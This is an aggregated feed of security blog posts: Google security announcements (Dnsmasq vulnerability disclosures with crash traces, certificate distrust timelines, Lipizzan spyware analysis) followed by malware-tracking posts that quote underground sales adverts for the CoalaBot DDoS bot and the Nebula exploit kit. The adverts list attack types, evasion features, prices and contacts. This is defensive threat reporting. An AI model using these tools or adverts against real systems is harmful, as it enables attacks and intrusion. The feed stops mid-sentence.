of this patch will increase the security of DNSMasq installations.We would like to thank Simon Kelley for his help in patching these bugs in the core Dnsmasq codebase. Users who have deployed the latest version of Dnsmasq (2.78) will be protected from the attacks discovered here. Android partners have received this patch as well and it will be included in Android's monthly security update for October. Kubernetes versions 1.5.8, 1.6.11, 1.7.7, and 1.8.0 have been released with a patched DNS pod. Other affected Google services have been updated.During our review, the team found three potential remote code executions, one information leak, and three denial of service vulnerabilities affecting the latest version at the project git server as of September 5th 2017.CVEImpactVectorNotesPoCCVE-2017-14491RCEDNSHeap based overflow (2 bytes). Before 2.76 and this commit overflow was unrestricted.PoC, instructions and ASAN reportCVE-2017-14492RCEDHCPHeap based overflow.PoC, instructions and ASAN reportCVE-2017-14493RCEDHCPStack Based overflow.PoC, instructions and ASAN reportCVE-2017-14494Information LeakDHCPCan help bypass ASLR. PoC and InstructionsCVE-2017-14495OOM/DoSDNSLack of free() here.PoC and  instructions CVE-2017-14496DoSDNSInvalid boundary checks here. Integer underflow leading to a huge memcpy.PoC, instructions and ASAN reportCVE-2017-13704DoSDNSBug collision with CVE-2017-13704It is worth expanding on some of these:CVE-2017-14491 is a DNS-based vulnerability that affects both directly exposed and internal network setups. Although the latest git version only allows a 2-byte overflow, this could be exploited based on previous research. Before version 2.76 and this commit the overflow is unrestricted. ==1159==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62200001dd0b at pc 0x0000005105e7 bp 0x7fff6165b9b0 sp0x7fff6165b9a8WRITE of size 1 at 0x62200001dd0b thread T0  #0 0x5105e6 in add_resource_record/test/dnsmasq/src/rfc1035.c:1141:7  #1 0x5127c8 in answer_request /test/dnsmasq/src/rfc1035.c:1428:11  #2 0x534578 in receive_query /test/dnsmasq/src/forward.c:1439:11  #3 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2  #4 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7  #5 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/  #6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)CVE-2017-14493 is a trivial-to-exploit DHCP-based, stack-based buffer overflow vulnerability. In combination with CVE-2017-14494 acting as an info leak, an attacker could bypass ASLR and gain remote code execution.dnsmasq[15714]: segfault at 1337deadbeef ip 00001337deadbeef sp 00007fff1b66fd10 error 14 in[7f7cfbacb000+a000]Android is affected by CVE-2017-14496 when the attacker is local or tethered directly to the device—the service itself is sandboxed so the risk is reduced. Android partners received patches on 5 September 2017 and devices with a 2017-10-01 security patch level or later address this issue.Proofs of concept are provided so you can check if you are affected by these issues, and verify any mitigations you may deploy.We would like to thank the following people for discovering, investigating impact/exploitability and developing PoCs: Felix Wilhelm, Fermin J. Serna, Gabriel Campana, Kevin Hamacher, Ron Bowes and Gynvael Coldwind of the Google Security Team.

Broadening HSTS to secure more of the Web

Wednesday October 18th, 2017 09:58:22 PM
Posted by Ben McIlwain, Google RegistryThe security of the Web is of the utmost importance to Google. One of the most powerful tools in the Web security toolbox is ensuring that connections to websites are encrypted using HTTPS, which prevents Web traffic from being intercepted, altered, or misdirected in transit. We have taken many actions to make the use of HTTPS more widespread, both within Google and on the larger Internet.We began in 2010 by defaulting to HTTPS for Gmail and starting the transition to encrypted search by default. In 2014, we started encouraging other websites to use HTTPS by giving secure sites a ranking boost in Google Search. In 2016, we became a platinum sponsor of Let’s Encrypt, a service that provides simple and free SSL certificates. Earlier this year we announced that Chrome will start displaying warnings on insecure sites, and we recently introduced fully managed SSL certificates in App Engine. And today we’re proud to announce that we are beginning to use another tool in our toolbox, the HTTPS Strict Transport Security (HSTS) preload list, in a new and more impactful way.The HSTS preload list is built in to all major browsers (Chrome, Firefox, Safari, Internet Explorer/Edge, and Opera). It consists of a list of hostnames for which browsers automatically enforce HTTPS-secured connections. For example, is on the list, which means that the aforementioned browsers will never make insecure connections to Gmail; if the user types, the browser first changes it to before sending the request. This provides greater security because the browser never loads an http-to-https redirect page, which could be intercepted.The HSTS preload list can contain individual domains or subdomains and even top-level domains (TLDs), which are added through the HSTS website. The TLD is the last part of the domain name, e.g., .com, .net, or .org. Google operates 45 TLDs, including .google, .how, and .soy. In 2015 we created the first secure TLD when we added .google to the HSTS preload list, and we are now rolling out HSTS for a larger number of our TLDs, starting with .foo and .dev.The use of TLD-level HSTS allows such namespaces to be secure by default. Registrants receive guaranteed protection for themselves and their users simply by choosing a secure TLD for their website and configuring an SSL certificate, without having to add individual domains or subdomains to the HSTS preload list. Moreover, since it typically takes months between adding a domain name to the list and browser upgrades reaching a majority of users, using an already-secured TLD provides immediate protection rather than eventual protection. Adding an entire TLD to the HSTS preload list is also more efficient, as it secures all domains under that TLD without the overhead of having to include all those domains individually.We hope to make some of these secure TLDs available for registration soon, and would like to see TLD-wide HSTS become the security standard for new TLDs.Updated 2017-10-06: To clear up some confusion in the responses to this post, we are not rolling out HSTS to Google's previously launched open TLDs (.how, .soy, and .みんな).

Safe Browsing: Protecting more than 3 billion devices worldwide, automatically

Monday September 11th, 2017 09:14:48 PM
Posted by Stephan Somogyi, Safe Browsing Emeritus and Allison Miller, Security & Privacy[Cross-posted from The Keyword]In 2007, we launched Safe Browsing, one of Google’s earliest anti-malware efforts. To keep our users safe, we’d show them a warning before they visited a site that might’ve harmed their computers.Computing has evolved a bit in the last decade, though. Smartphones created a more mobile internet, and now AI is increasingly changing how the world interacts with it. Safe Browsing also had to evolve to effectively protect users.And it has: In May 2016, we announced that Safe Browsing was protecting more than 2 billion devices from badness on the internet. Today we’re announcing that Safe Browsing has crossed the threshold to 3 billion devices. We’re sharing a bit more about how we got here, and where we’re going.What is Safe Browsing?You may not know Safe Browsing by name, since most of the time we’re invisibly protecting you, without getting in the way. But you may have seen a warning like this at some point:This notification is one of the visible parts of Safe Browsing, a collection of Google technologies that hunt badness—typically websites that deceive users—on the internet. We identify sites that might try to phish you, or sites that install malware or other undesirable software. The systems that make up Safe Browsing work together to identify, analyze and continuously keep Safe Browsing’s knowledge of the harmful parts of the internet up to date.This protective information that we generate—a curated list of places that are dangerous for people and their devices—is used across many of our products. It helps keep search results safe and keep ads free from badness; it’s integral to Google Play Protect and keeps you safe on Android; and it helps Gmail shield you from malicious messages.And Safe Browsing doesn’t protect only Google’s products. For many years, Safari and Firefox have protected their users with Safe Browsing as well. If you use an up-to-date version of Chrome, Firefox or Safari, you’re protected by default. Safe Browsing is also used widely by web developers and app developers (including Snapchat), who integrate our protections by checking URLs before they’re presented to their users.Protecting more people with fewer bitsIn the days when web browsers were used only on personal computers, we didn’t worry much about the amount of data Safe Browsing sent over the internet to keep your browser current. Mobile devices changed all that: Slow connections, expensive mobile data plans, and scarce battery capacity became important new considerations.So over the last few years, we’ve rethought how Safe Browsing delivers data. We built new technologies to make its data as compact as possible: We only send the information that’s most protective to a given device, and we make sure this data is compressed as tightly as possible. (All this work benefits desktop browsers, too!)We initially introduced our new mobile-optimized method in late 2015 with Chrome on Android, made it more broadly available in mid-2016, when we also started actively encouraging Android developers to integrate it. With the release of iOS 10 in September 2016, Safari began using our new, efficient Safe Browsing update technology, giving iOS users a protection boost.Safe Browsing in an AI-first worldThe internet is at the start of another major shift. Safe Browsing has already been using machine learning for many years to detect much badness of many kinds. We’re continually evaluating and integrating cutting-edge new approaches to improve Safe Browsing.Protecting all users across all their platforms makes the internet safer for everyone. Wherever the future of the internet takes us, Safe Browsing will be there, continuing to evolve, expand, and protect people wherever they are.

Chrome’s Plan to Distrust Symantec Certificates

Thursday February 1st, 2018 07:28:36 AM
Posted by Devon O’Brien, Ryan Sleevi, Andrew Whalley, Chrome SecurityThis post is a broader announcement of plans already finalized on the blink-dev mailing list.Update, 1/31/18: Post was updated to further clarify 13 month validity limitationsAt the end of July, the Chrome team and the PKI community converged upon a plan to reduce, and ultimately remove, trust in Symantec’s infrastructure in order to uphold users’ security and privacy when browsing the web. This plan, arrived at after significant debate on the blink-dev forum, would allow reasonable time for a transition to new, independently-operated Managed Partner Infrastructure while Symantec modernizes and redesigns its infrastructure to adhere to industry standards. This post reiterates this plan and includes a timeline detailing when site operators may need to obtain new certificates.On January 19, 2017, a public posting to the newsgroup drew attention to a series of questionable website authentication certificates issued by Symantec Corporation’s PKI. Symantec’s PKI business, which operates a series of Certificate Authorities under various brand names, including Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL, had issued numerous certificates that did not comply with the industry-developed CA/Browser Forum Baseline Requirements. During the subsequent investigation, it was revealed that Symantec had entrusted several organizations with the ability to issue certificates without the appropriate or necessary oversight, and had been aware of security deficiencies at these organizations for some time.This incident, while distinct from a previous incident in 2015, was part of a continuing pattern of issues over the past several years that has caused the Chrome team to lose confidence in the trustworthiness of Symantec’s infrastructure, and as a result, the certificates that have been or will be issued from it.After our agreed-upon proposal was circulated, Symantec announced the selection of DigiCert to run this independently-operated Managed Partner Infrastructure, as well as their intention to sell their PKI business to DigiCert in lieu of building a new trusted infrastructure. This post outlines the timeline for that transition and the steps that existing Symantec customers should take to minimize disruption to their users.Information For Site OperatorsStarting with Chrome 66, Chrome will remove trust in Symantec-issued certificates issued prior to June 1, 2016. Chrome 66 is currently scheduled to be released to Chrome Beta users on March 15, 2018 and to Chrome Stable users around April 17, 2018.If you are a site operator with a certificate issued by a Symantec CA prior to June 1, 2016, then prior to the release of Chrome 66, you will need to replace the existing certificate with a new certificate from any Certificate Authority trusted by Chrome.Additionally, by December 1, 2017, Symantec will transition issuance and operation of publicly-trusted certificates to DigiCert infrastructure, and certificates issued from the old Symantec infrastructure after this date will not be trusted in Chrome.Around the week of October 23, 2018, Chrome 70 will be released, which will fully remove trust in Symantec’s old infrastructure and all of the certificates it has issued. This will affect any certificate chaining to Symantec roots, except for the small number issued by the independently-operated and audited subordinate CAs previously disclosed to Google.Site operators that need to obtain certificates from Symantec’s existing root and intermediate certificates may do so from the old infrastructure until December 1, 2017, although these certificates will need to be replaced again prior to Chrome 70. Additionally, certificates issued using validation information from Symantec’s infrastructure will have their validity limited to 13 months. Alternatively, site operators may obtain replacement certificates from any other Certificate Authority currently trusted by Chrome, which are unaffected by this distrust or validity period limit.Reference TimelineThe following is a timeline of relevant dates associated with this plan, which distills the various requirements and milestones into an actionable set of information for site operators. As always, Chrome release dates can vary by a number of days, but upcoming release dates can be tracked here.DateEventNowthrough ~March 15, 2018Site Operators using Symantec-issued TLS server certificates issued before June 1, 2016 should replace these certificates. These certificates can be replaced by any currently trusted CA.~October 24, 2017Chrome 62 released to Stable, which will add alerting in DevTools when evaluating certificates that will be affected by the Chrome 66 distrust.December 1, 2017According to Symantec, DigiCert’s new “Managed Partner Infrastructure” will at this point be capable of full issuance. Any certificates issued by Symantec’s old infrastructure after this point will cease working in a future Chrome update.From this date forward, Site Operators can obtain TLS server certificates from the new Managed Partner Infrastructure that will continue to be trusted after Chrome 70 (~October 23, 2018). December 1, 2017 does not mandate any certificate changes, but represents an opportunity for site operators to obtain TLS server certificates that will not be affected by Chrome 70’s distrust of the old infrastructure.~March 15, 2018Chrome 66 released to beta, which will remove trust in Symantec-issued certificates with a not-before date prior to June 1, 2016. As of this date Site Operators must be using either a Symantec-issued TLS server certificate issued on or after June 1, 2016 or a currently valid certificate issued from any other trusted CA as of Chrome 66.Site Operators that obtained a certificate from Symantec’s old infrastructure after June 1, 2016 are unaffected by Chrome 66 but will need to obtain a new certificate by the Chrome 70 dates described below.~April 17, 2018Chrome 66 released to Stable.~September 13, 2018Chrome 70 released to Beta, which will remove trust in the old Symantec-rooted Infrastructure. This will not affect any certificate chaining to the new Managed Partner Infrastructure, which Symantec has said will be operational by December 1, 2017.Only TLS server certificates issued by Symantec’s old infrastructure will be affected by this distrust regardless of issuance date.~October 23, 2018Chrome 70 released to Stable.

From Chrysaor to Lipizzan: Blocking a new targeted spyware family

Wednesday July 26th, 2017 08:06:42 PM
Posted by Megan Ruthven Android Security, Ken Bodzak Threat Analysis Group, Neel Mehta Threat Analysis GroupAndroid Security is always developing new ways of using data to find and block potentially harmful apps (PHAs) from getting onto your devices. Earlier this year, we announced we had blocked Chrysaor targeted spyware, believed to be written by NSO Group, a cyber arms company. In the course of our Chrysaor investigation, we used similar techniques to discover a new and unrelated family of spyware called Lipizzan. Lipizzan’s code contains references to a cyber arms company, Equus Technologies.Lipizzan is a multi-stage spyware product capable of monitoring and exfiltrating a user’s email, SMS messages, location, voice calls, and media. We have found 20 Lipizzan apps distributed in a targeted fashion to fewer than 100 devices in total and have blocked the developers and apps from the Android ecosystem. Google Play Protect has notified all affected devices and removed the Lipizzan apps.We’ve enhanced Google Play Protect’s capabilities to detect the targeted spyware used here and will continue to use this framework to block more targeted spyware. To learn more about the methods Google uses to find targeted mobile spyware like Chrysaor and Lipizzan, attend our BlackHat talk, Fighting Targeted Malware in the Mobile Ecosystem.How does Lipizzan work?Getting on a target deviceLipizzan was a sophisticated two stage spyware tool. The first stage found by Google Play Protect was distributed through several channels, including Google Play, and typically impersonated an innocuous-sounding app such as a "Backup” or “Cleaner” app. Upon installation, Lipizzan would download and load a second "license verification" stage, which would survey the infected device and validate certain abort criteria. If given the all-clear, the second stage would then root the device with known exploits and begin to exfiltrate device data to a Command & Control server.Once implanted on a target deviceThe Lipizzan second stage was capable of performing and exfiltrating the results of the following tasks:Call recordingVOIP recordingRecording from the device microphoneLocation monitoringTaking screenshotsTaking photos with the device camera(s)Fetching device information and filesFetching user information (contacts, call logs, SMS, application-specific data)The PHA had specific routines to retrieve data from each of the following apps:GmailHangoutsKakaoTalkLinkedInMessengerSkypeSnapchatStockEmailTelegramThreemaViberWhatsappWe saw all of this behavior on a standalone stage 2 app, (not related to Android MediaServer). This app shared a signing certificate with one of the stage 1 applications,, indicating the same author wrote the two. We could use the following code snippet from the 2nd stage ( to draw ties to the stage 1 applications.Morphing first stageAfter we blocked the first set of apps on Google Play, new apps were uploaded with a similar format but had a couple of differences.The apps changed from ‘backup’ apps to looking like a “cleaner”, “notepad”, “sound recorder”, and “alarm manager” app. The new apps were uploaded within a week of the takedown, showing that the authors have a method of easily changing the branding of the implant apps.The app changed from downloading an unencrypted stage 2 to including stage 2 as an encrypted blob. The new stage 1 would only decrypt and load the 2nd stage if it received an intent with an AES key and IV.Despite changing the type of app and the method to download stage 2, we were able to catch the new implant apps soon after upload.How many devices were affected?There were fewer than 100 devices that checked into Google Play Protect with the apps listed below. That means the family affected only 0.000007% of Android devices. Since we identified Lipizzan, Google Play Protect removed Lipizzan from affected devices and actively blocks installs on new devices.What can you do to protect yourself?Ensure you are opted into Google Play Protect. Exclusively use the Google Play store. The chance you will install a PHA is much lower on Google Play than using other install mechanisms.Keep “unknown sources” disabled while not using it.Keep your phone patched to the latest Android security update.List of samples1st stageNewer version Standalone 2nd stage

Final removal of trust in WoSign and StartCom Certificates

Thursday July 20th, 2017 06:19:53 PM
Posted by Andrew Whalley and Devon O'Brien, Chrome SecurityAs previously announced, Chrome has been in the process of removing trust from certificates issued by the CA WoSign and its subsidiary StartCom, as a result of several incidents not in keeping with the high standards expected of CAs.We started the phase out in Chrome 56 by only trusting certificates issued prior to October 21st 2016, and subsequently restricted trust to a set of whitelisted hostnames based on the Alexa Top 1M. We have been reducing the size of the whitelist over the course of several Chrome releases.Beginning with Chrome 61, the whitelist will be removed, resulting in full distrust of the existing WoSign and StartCom root certificates and all certificates they have issued.Based on the Chromium Development Calendar, this change is visible in the Chrome Dev channel now, the Chrome Beta channel around late July 2017, and will be released to Stable around mid September 2017.Sites still using StartCom or WoSign-issued certificates should consider replacing these certificates as a matter of urgency to minimize disruption for Chrome users.

Identifying Intrusive Mobile Apps Using Peer Group Analysis

Wednesday July 12th, 2017 05:08:36 PM
Posted by Martin Pelikan, Giles Hogben, and Ulfar Erlingsson of Google’s Security and Privacy teamMobile apps entertain and assist us, make it easy to communicate with friends and family, and provide tools ranging from maps to electronic wallets. But these apps could also seek more device information than they need to do their job, such as personal data and sensor data from components, like cameras and GPS trackers.To protect our users and help developers navigate this complex environment, Google analyzes privacy and security signals for each app in Google Play. We then compare that app to other apps with similar features, known as functional peers. Creating peer groups allows us to calibrate our estimates of users’ expectations and set adequate boundaries of behaviors that may be considered unsafe or intrusive. This process helps detect apps that collect or send sensitive data without a clear need, and makes it easier for users to find apps that provide the right functionality and respect their privacy. For example, most coloring book apps don’t need to know a user’s precise location to function and this can be established by analyzing other coloring book apps. By contrast, mapping and navigation apps need to know a user’s location, and often require GPS sensor access.One way to create app peer groups is to create a fixed set of categories and then assign each app into one or more categories, such as tools, productivity, and games. However, fixed categories are too coarse and inflexible to capture and track the many distinctions in the rapidly changing set of mobile apps. Manual curation and maintenance of such categories is also a tedious and error-prone task.To address this, Google developed a machine-learning algorithm for clustering mobile apps with similar capabilities. Our approach uses deep learning of vector embeddings to identify peer groups of apps with similar functionality, using app metadata, such as text descriptions, and user metrics, such as installs. Then peer groups are used to identify anomalous, potentially harmful signals related to privacy and security, from each app’s requested permissions and its observed behaviors. The correlation between different peer groups and their security signals helps different teams at Google decide which apps to promote and determine which apps deserve a more careful look by our security and privacy experts. We also use the result to help app developers improve the privacy and security of their apps.Apps are split into groups of similar functionality, and in each cluster of similar apps the established baseline is used to find anomalous privacy and security signals.These techniques build upon earlier ideas, such as using peer groups to analyze privacy-related signals, deep learning for language models to make those peer groups better, and automated data analysis to draw conclusions.Many teams across Google collaborated to create this algorithm and the surrounding process. Thanks to several, essential team members including Andrew Ahn, Vikas Arora, Hongji Bao, Jun Hong, Nwokedi Idika, Iulia Ion, Suman Jana, Daehwan Kim, Kenny Lim, Jiahui Liu, Sai Teja Peddinti, Sebastian Porst, Gowdy Rajappan, Aaron Rothman, Monir Sharif, Sooel Son, Michael Vrable, and Qiang Yan.For more information on Google’s efforts to detect and fight potentially harmful apps (PHAs) on Android, see Google Android Security Team’s Classifications for Potentially Harmful Applications.ReferencesS. Jana, Ú. Erlingsson, I. Ion (2015). Apples and Oranges: Detecting Least-Privilege Violators with Peer Group Analysis. arXiv:1510.07308 [cs.CR].T. Mikolov, I. Sutskever, K. Chen, G. S. Corrado, J. Dean (2013). Distributed Representations of Words and Phrases and their Compositionality. Advances in Neural Information Processing Systems 26 (NIPS 2013).Ú. Erlingsson (2016). Data-driven software security: Models and methods. Proceedings of the 29th IEEE Computer Security Foundations Symposium (CSF'16), Lisboa, Portugal.

Making the Internet safer and faster: Introducing reCAPTCHA Android API

Friday June 9th, 2017 04:32:35 PM
Posted by Wei Liu, Product Manager, reCAPTCHAWhen we launched reCAPTCHA ten years ago, we had a simple goal: enable users to visit the sites they love without worrying about spam and abuse. Over the years, reCAPTCHA has changed quite a bit. It evolved from the distorted text to street numbers and names, then No CAPTCHA reCAPTCHA in 2014 and Invisible reCAPTCHA in March this year.By now, more than a billion users have benefited from reCAPTCHA and we continue to work to refine our protections.reCAPTCHA protects users wherever they may be online. As the use of mobile devices has grown rapidly, it’s important to keep the mobile applications and data safe. Today, on reCAPTCHA’s tenth birthday, we’re glad to announce the first reCAPTCHA Android API as part of Google Play Services.With this API, reCAPTCHA can better tell human and bots apart to provide a streamlined user experience on mobile. It will use our newest Invisible reCAPTCHA technology, which runs risk analysis behind the scene and has enabled millions of human users to pass through with zero click everyday. Now mobile users can enjoy their apps without being interrupted, while still staying away from spam and abuse.reCAPTCHA Android API is included with Google SafetyNet, which provides services like device attestation and safe browsing to protect mobile apps. Mobile developers can do both the device and user attestations in the same API to mitigate security risks of their apps more efficiently. This adds to the diversity of security protections on Android: Google Play Protect to monitor for potentially harmful applications, device encryption, and regular security updates. Please visit our site to learn more about how to integrate with the reCAPTCHA Android API, and keep an eye out for our iOS library.The journey of reCAPTCHA continues: we’ll make the Internet safer and easier to use for everyone (except bots).

Announcing Google Capture the Flag 2017

Friday June 2nd, 2017 09:29:19 PM
Posted by Josh Armour Security Program ManagerOn 00:00:01 UTC of June 17th and 18th, 2017 we’ll be hosting the online qualification round of our second annual Capture The Flag (CTF) competition. In a ‘Capture the Flag’ competition we create security challenges and puzzles in which contestants can earn points for solving them. We will be inviting the top 10 finalist teams to a secret undisclosed location (spoiler alert: it’s Google) to compete onsite for a prize pool of over USD$31,337 and we’ll help subsidize travel to the venue for the finals to four participants for each of the ten finalist teams. In addition to grand prizes given at the finals, we’ll be rewarding some of the best and creative write-ups that we receive during the qualifying round. We want to give you an opportunity to share with the world the clever way you solve challenges.Why do we host these competitions?There are three main reasons why we host these competitions.First, as we've seen with our Vulnerability Reward Program, the security community’s efforts help us better protect Google users, and the web as a whole. We’d like to give the people who solve a single challenge or two in a very clever way a chance to teach us and the security community, even if they don’t qualify for the finals. We also think that these challenges allows us to share with the world the types of problems our security team works on every day.Second, we want to engage the broader security community and reach out to as many people involved as possible. At the Google CTF last year the winning team, ‘Pasten’ from Israel, earned over 4,700 points competing against 2,400 teams out of which 900 were able to solve at least one of our challenges. Thanks to the community's feedback, we used what we learned last year to make our CTF even better this time.Lastly, we also want to grow the security community. Upon observing how last year's competition engaged new players from all over the world, we want to continue to create a safe space for people to come and learn while trying to solve challenges and having fun. Our internal security team employs several people who actively compete in CTF competitions in their spare time, so we value this activity and want to give back to and help grow our community.We hope to virtually see you at the 2nd annual Google CTF on June 17th at 00:00:01 UTC. Check this site ( for more details, as they become available.The Big PictureAt Google, we aim to reward the hard work of hackers and security researchers. One such avenue is our Google Vulnerability Rewards Programs. Many of the best bug hunters enjoy participating in ‘Capture The Flag’ contests, and great vulnerabilities have been discovered and disclosed at them. During last year's Google CTF we also received some security bug reports in our scoreboard, for which we gave out rewards under the VRP. Another way we reward this community is with our Vulnerability Research Grants Program and our Patch Rewards Program. We look forward to the best contestants taking some time to explore our other programs for opportunities to make some money and help improve the security of the internet.

2017 Android Security Rewards

Thursday June 1st, 2017 04:18:01 PM
Posted by Mayank Jain and Scott Roberts, Android Security team[Cross-posted from the Android Developers Blog]Two years ago, we launched the Android Security Rewards program. In its second year, we've seen great progress. We received over 450 qualifying vulnerability reports from researchers and the average pay per researcher jumped by 52.3%. On top of that, the total Android Security Rewards payout doubled to $1.1 million dollars. Since it launched, we've rewarded researchers over $1.5 million dollars.Here are some of the highlights from the Android Security Rewards program's second year:There were no payouts for the top reward for a complete remote exploit chain leading to TrustZone or Verified Boot compromise, our highest award amount possible.We paid 115 individuals with an average of $2,150 per reward and $10,209 per researcher.We paid our top research team, C0RE Team, over $300,000 for 118 vulnerability reports.We paid 31 researchers $10,000 or more.Thank you to all the amazing researchers who submitted complete vulnerability reports to us last year.Improvements to Android Security Rewards programWe’re constantly working to improve the Android Security Rewards program and today we’re making a few changes to all vulnerability reports filed after June 1, 2017.Because every Android release includes more security protections and no researcher has claimed the top reward for an exploit chains in 2 years, we’re excited to increase our top-line payouts for these exploits.Rewards for a remote exploit chain or exploit leading to TrustZone or Verified Boot compromise increase from $50,000 to $200,000.Rewards for a remote kernel exploit increase from $30,000 to $150,000.In addition to rewarding for vulnerabilities, we continue to work with the broad and diverse Android ecosystem to protect users from issues reported through our program. We collaborate with manufacturers to ensure that these issues are fixed on their devices through monthly security updates. Over 100 device models have a majority of their deployed devices running a security update from the last 90 days. This table shows the models with a majority of deployed devices running a security update from the last two months:Manufacturer Device BlackBerryPRIVFujitsuF-01JGeneral MobileGM5 Plus d, GM5 Plus, General Mobile 4G Dual, General Mobile 4GGioneeA1GooglePixel XL, Pixel, Nexus 6P, Nexus 6, Nexus 5X, Nexus 9LGELG G6, V20, Stylo 2 V, GPAD 7.0 LTEMotorolaMoto Z, Moto Z DroidOppoCPH1613, CPH1605SamsungGalaxy S8+, Galaxy S8, Galaxy S7, Galaxy S7 Edge, Galaxy S7 Active, Galaxy S6 Active, Galaxy S5 Dual SIM, Galaxy C9 Pro, Galaxy C7, Galaxy J7, Galaxy On7 Pro, Galaxy J2, Galaxy A8, Galaxy Tab S2 9.7SharpAndroid One S1, 507SHSonyXperia XA1, Xperia XVivoVivo 1609, Vivo 1601, Vivo Y55Source: Google, May 29, 2017Thank you to everyone who helped make Android safer and stronger in the past year. Together, we made a huge investment in security research that helps Android users everywhere. If you want to get involved to make next year even better, check out our detailed Program Rules. For tips on how to submit complete reports, see Bug Hunter University.

New Built-In Gmail Protections to Combat Malware in Attachments

Wednesday May 31st, 2017 05:03:07 PM
Posted by Sri Somanchi, Product Manager, Gmail anti-spamToday we announced new security features for Gmail customers, including early phishing detection using machine learning, click-time warnings for malicious links, and unintended external reply warnings. In addition, we have also updated our defenses against malicious attachments.Let’s take a deeper look at the new defenses against malicious attachments. We now correlate spam signals with attachment and sender heuristics, to predict messages containing new and unseen malware variants. These protections enable Gmail to better protect our users from zero-day threats, ransomware and polymorphic malware.In addition, we block use of file types that carry a high potential for security risks including executable and javascript files.Machine learning has helped Gmail achieve more than 99% accuracy in spam detection, and with these new protections, we’re able to reduce your exposure to threats by confidently rejecting hundreds of millions of additional messages every day.Constantly improving our automatic protectionsThese new changes are just the latest in our ongoing work to improve our protections as we work to keep ahead of evolving threats. For many years, scammers have tried to use dodgy email attachments to sneak past our spam filters, and we’ve long blocked this potential abuse in a variety of ways, including:Rejecting the message and notifying the sender if we detect a virus in an email.Preventing you from sending a message with an infected attachment.Preventing you from downloading attachments if we detect a virus.While the bad guys never rest, neither do we.These protections were made possible due to extensive contribution from Vijay Eranti & Timothy Schumacher (Gmail anti-spam) & Harish Gudelly (Google anti-virus) & Lucio Tudisco (G Suite anti-abuse)

Failed to get content from ''

Malware don't need Coffee

Last feed update: Tuesday March 6th, 2018 11:07:51 PM

CoalaBot : http Ddos Bot

Monday October 16th, 2017 04:30:39 PM
CoalaBot appears to be build on August Stealer code (Panel and Traffic are really alike)I found it spread as a tasks in a Betabot and in an Andromeda spread via RIG fed by at least one HilltopAds malvertising. 2017-09-11: a witnessed infection chain to CoalaBotA look inside :CoalaBot: Login Screen(August Stealer alike) CoalaBot: StatisticsCoalaBot: BotsCoalaBot: TasksCoalaBot: TasksCoalaBot: New Taks (list)CoalaBot: https get task detailsCoalaBot: http post task detailsCoalaBot: SettingsHere is the translated associated advert published on 2017-08-23 by a user going with nick : Discomrade.(Thanks to Andrew Komarov and others who provided help here).------------------------------------------Coala Http Ddos Bot The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.Attack types:• ICMP (PING) FLOOD• UDP FLOOD• TCP FLOOD• HTTP ARME• HTTP GET *• HTTP POST *• HTTP SLOWLORIS *• HTTP PULSE WAVE ** - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.Binary:• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7, on later versions ОС .NET 2.0 disabled by default)• ~100kb after obfuscation• Auto Backup (optional)• Low CPU load for efficient use• Encryption of incoming/outgoing traffic• No installation on machines from former CIS countries(RU/UA/BL/KZ/...)• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.• Ability to link a build to more than one gate.Panel:• Detailed statistics on time online/architecture/etc. • List of bots, detailed information• Number count of requests per second (total/for each bot)• Creation of groups for attacks• Auto sorting of bots by groups • Creation of tasks, the ability to choose by group/country• Setting an optional time for bots success rate Other:• Providing macros for randomization of sent data • Support of .onion gate• Ability to install an additional layer (BOT => LAYER => MAIN GATE) Requirements:• PHP 5.6 or higher• MySQL• Мodule for MySQLi(mysqli_nd); php-mbstring, php-json, php-mcrypt extensionsScreenshots:• Statistics-• Bots -• Created tasks -• Task List -• Settings -• $300 - build and panel. Up to 3 gates for one build.• $20 - rebuildThe price can vary depending on updates.Escrow service is welcome.Help with installation is no charge.------------------------------------------Sample:VT linkMD5 f3862c311c67cb027a06d4272b680a3bSHA1 0ff1584eec4fc5c72439d94e8cee922703c44049SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08fEmerging Threats rules :2024531 || ET TROJAN MSIL/CoalaBot CnC ActivityRead More:August in November: New Information Stealer Hits the Scene - 2016-12-07 - Proofpoint

Bye Empire, Hello Nebula Exploit Kit.

Thursday March 9th, 2017 08:20:31 AM
Nebula LogoWhile Empire (RIG-E) disappeared at the end of December after 4 months of activityIllustration of  the last month of witnessed Activity for Empireon 2017-02-17 an advert for a new exploit kit dubbed Nebula appeared underground.------Selling EK Nebula------Nebula Exploit kitFeatures:-Automatic domain scanning and generating (99% FUD)-API rotator domains-Exploit rate tested in different traffic go up 8/19%-knock rate tested whit popular botnet go 30/70%-Clean and modern user interface-Custom domains & server ( add & point your own domains coming soon...)-Unlimited flows & files-Scan file & domains-Multiple payload file types supported (exe , dll , js, vbs)-Multi. geo flow (split loads by country & file)-Remote file support ( check every 1 minute if file hash change ; if changed replace ) for automatic crypting-Public stats by file & flow-latest CVE-2016 CVE-2017-custom features just ask supportSubscriptions:24h - 100$7d - 600$31d - 2000$Jabber - nebula-support@xmpp.jpOffering free tests to trusted users ------In same thread some screenshots were shared by a customer.Earlier that same day, colleagues at Trendmicro told me they were seeing activity from a group we are following under the name "GamiNook" (illustration coming later) in Japan redirecting traffic to a variation of Sundown."GamiNook" redirecting to a Sundown Variation in Japan - 2017-02-17Payload : Pitou (6f9d71eebe319468927f74b93c820ce4 ) This Sundown variation was not so much different from the mainstream one.No "index.php?" in the landing URI, different domain pattern but same landing, exploits, etc... Some payload sent in clear (01.php) other RC4 encoded (00.php) as for Sundown.Digging more it appeared it was featuring an Internal TDS (as Empire). The same exact call would give you a different payload in France or in United Kingdom/Japan."GamiNook" traffic with geo in France - 2017-02-17Identicall payload call gives you Gootkit instead of PitouPayload : Gootkit (48ae9a5d10085e5f6a1221cd1eedade6)Note: to be sure that the payload difference is tied to Geo and not time based (rotation or operator changing it ) you need to make at least a third pass with first Geo and ensure dropped sample is identical as in first pass.At that point you can only suspect this Sundown variant might be Nebula (even if clues are multiple, a funny one being that the 